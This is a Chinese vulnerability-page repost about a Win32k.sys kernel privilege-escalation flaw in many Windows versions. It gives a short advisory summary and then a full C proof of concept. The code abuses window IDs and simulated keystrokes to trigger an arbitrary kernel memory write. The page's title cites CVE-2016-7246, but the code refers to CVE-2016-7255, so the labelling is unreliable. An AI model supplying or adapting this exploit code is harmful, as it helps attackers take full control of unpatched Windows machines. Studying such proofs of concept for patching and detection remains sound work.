首页 » 漏洞 » Win32k.sys’本地权限提升漏洞(CVE-2016-7246)(MS16-135)

Win32k.sys’本地权限提升漏洞(CVE-2016-7246)(MS16-135)

 

受影响系统:

Microsoft Windows Server 2016
Microsoft Windows Server 2012 R2
Microsoft Windows Server 2012
Microsoft Windows Server 2008 R2
Microsoft Windows RT 8.1
Microsoft Windows 8.1
Microsoft Windows 7
Microsoft Windows 10

漏洞详情

如果 Windows 内核模式驱动程序无法正确处理内存中对象,则会存在多个特权提升漏洞。成功利用此漏洞的攻击者可以在内核模式下运行任意代码。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。

攻击者必须先登录系统,然后才能利用这些漏洞。然后攻击者可以运行一个为利用这些漏洞而经特殊设计的应用程序,从而控制受影响的系统。该更新通过更正 Windows 内核模式驱动程序处理内存中对象的方式来解决这些漏洞。

 

poc

 

 

// 参考 https://github.com/tinysec/public/tree/master/CVE-2016-7255  #include <windows.h> #include <wchar.h> #include <stdlib.h> #include <stdio.h>   #pragma comment(lib,"ntdll.lib") #pragma comment(lib,"user32.lib")  #undef DbgPrint ULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... ); ULONG __cdecl DbgPrint(__in char* Format, ...) {     CHAR* pszDbgBuff = NULL;     va_list VaList=NULL;     ULONG ulRet = 0;      do      {         pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR));         if (NULL == pszDbgBuff)         {             break;         }         RtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR));          va_start(VaList,Format);          _vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList);          DbgPrintEx(77 , 0 , pszDbgBuff );         OutputDebugStringA(pszDbgBuff);          va_end(VaList);      } while (FALSE);      if (NULL != pszDbgBuff)     {         HeapFree( GetProcessHeap(), 0 , pszDbgBuff );         pszDbgBuff = NULL;     }      return ulRet; }    int _sim_key_down(WORD wKey)  {      INPUT stInput = {0};       do       {          stInput.type = INPUT_KEYBOARD;          stInput.ki.wVk = wKey;          stInput.ki.dwFlags = 0;           SendInput(1 , &stInput , sizeof(stInput) );       } while (FALSE);       return 0; }   int _sim_key_up(WORD wKey)  {      INPUT stInput = {0};       do       {          stInput.type = INPUT_KEYBOARD;          stInput.ki.wVk = wKey;          stInput.ki.dwFlags = KEYEVENTF_KEYUP;           SendInput(1 , &stInput , sizeof(stInput) );       } while (FALSE);       return 0; }   int _sim_alt_shift_esc()  {      int i = 0;       do       {          _sim_key_down( VK_MENU );          _sim_key_down( VK_SHIFT );             _sim_key_down( VK_ESCAPE);         _sim_key_up( VK_ESCAPE);          _sim_key_down( VK_ESCAPE);         _sim_key_up( VK_ESCAPE);           _sim_key_up( VK_MENU );          _sim_key_up( VK_SHIFT );                } while (FALSE);       return 0; }     int _sim_alt_shift_tab(int nCount)  {      int i = 0;      HWND hWnd = NULL;        int nFinalRet = -1;       do       {          _sim_key_down( VK_MENU );          _sim_key_down( VK_SHIFT );              for ( i = 0; i < nCount ; i++)          {              _sim_key_down( VK_TAB);              _sim_key_up( VK_TAB);               Sleep(1000);           }           _sim_key_up( VK_MENU );          _sim_key_up( VK_SHIFT );          } while (FALSE);       return nFinalRet; }    int or_address_value_4(__in void* pAddress) {     WNDCLASSEXW stWC = {0};      HWND    hWndParent = NULL;     HWND    hWndChild = NULL;      WCHAR*  pszClassName = L"cve-2016-7255";     WCHAR*  pszTitleName = L"cve-2016-7255";      void*   pId = NULL;     MSG     stMsg = {0};      do      {          stWC.cbSize = sizeof(stWC);         stWC.lpfnWndProc = DefWindowProcW;         stWC.lpszClassName = pszClassName;          if ( 0 == RegisterClassExW(&stWC) )         {             break;         }          hWndParent = CreateWindowExW(             0,             pszClassName,             NULL,             WS_OVERLAPPEDWINDOW|WS_VISIBLE,             0,             0,             360,             360,             NULL,             NULL,             GetModuleHandleW(NULL),             NULL         );          if (NULL == hWndParent)         {             break;         }          hWndChild = CreateWindowExW(             0,             pszClassName,             pszTitleName,             WS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD,             0,             0,             160,             160,             hWndParent,             NULL,             GetModuleHandleW(NULL),             NULL         );          if (NULL == hWndChild)         {             break;         }          #ifdef _WIN64             pId = ( (UCHAR*)pAddress - 0x28 );          #else             pId = ( (UCHAR*)pAddress - 0x14);          #endif // #ifdef _WIN64          SetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId );          DbgPrint("hWndChild = 0x%p/n" , hWndChild);         DebugBreak();          ShowWindow(hWndParent , SW_SHOWNORMAL);          SetParent(hWndChild , GetDesktopWindow() );          SetForegroundWindow(hWndChild);          _sim_alt_shift_tab(4);          SwitchToThisWindow(hWndChild , TRUE);          _sim_alt_shift_esc();           while( GetMessage(&stMsg , NULL , 0 , 0) )         {                TranslateMessage(&stMsg);             DispatchMessage(&stMsg);         }       } while (FALSE);      if ( NULL != hWndParent )     {         DestroyWindow(hWndParent);         hWndParent = NULL;     }      if ( NULL != hWndChild )     {         DestroyWindow(hWndChild);         hWndChild = NULL;     }      UnregisterClassW(pszClassName , GetModuleHandleW(NULL) );      return 0; }  int __cdecl wmain(int nArgc, WCHAR** Argv) {     do      {         or_address_value_4( (void*)0xFFFFFFFF );     } while (FALSE);      return 0; }

原文链接:Win32k.sys’本地权限提升漏洞(CVE-2016-7246)(MS16-135),转载请注明来源!

0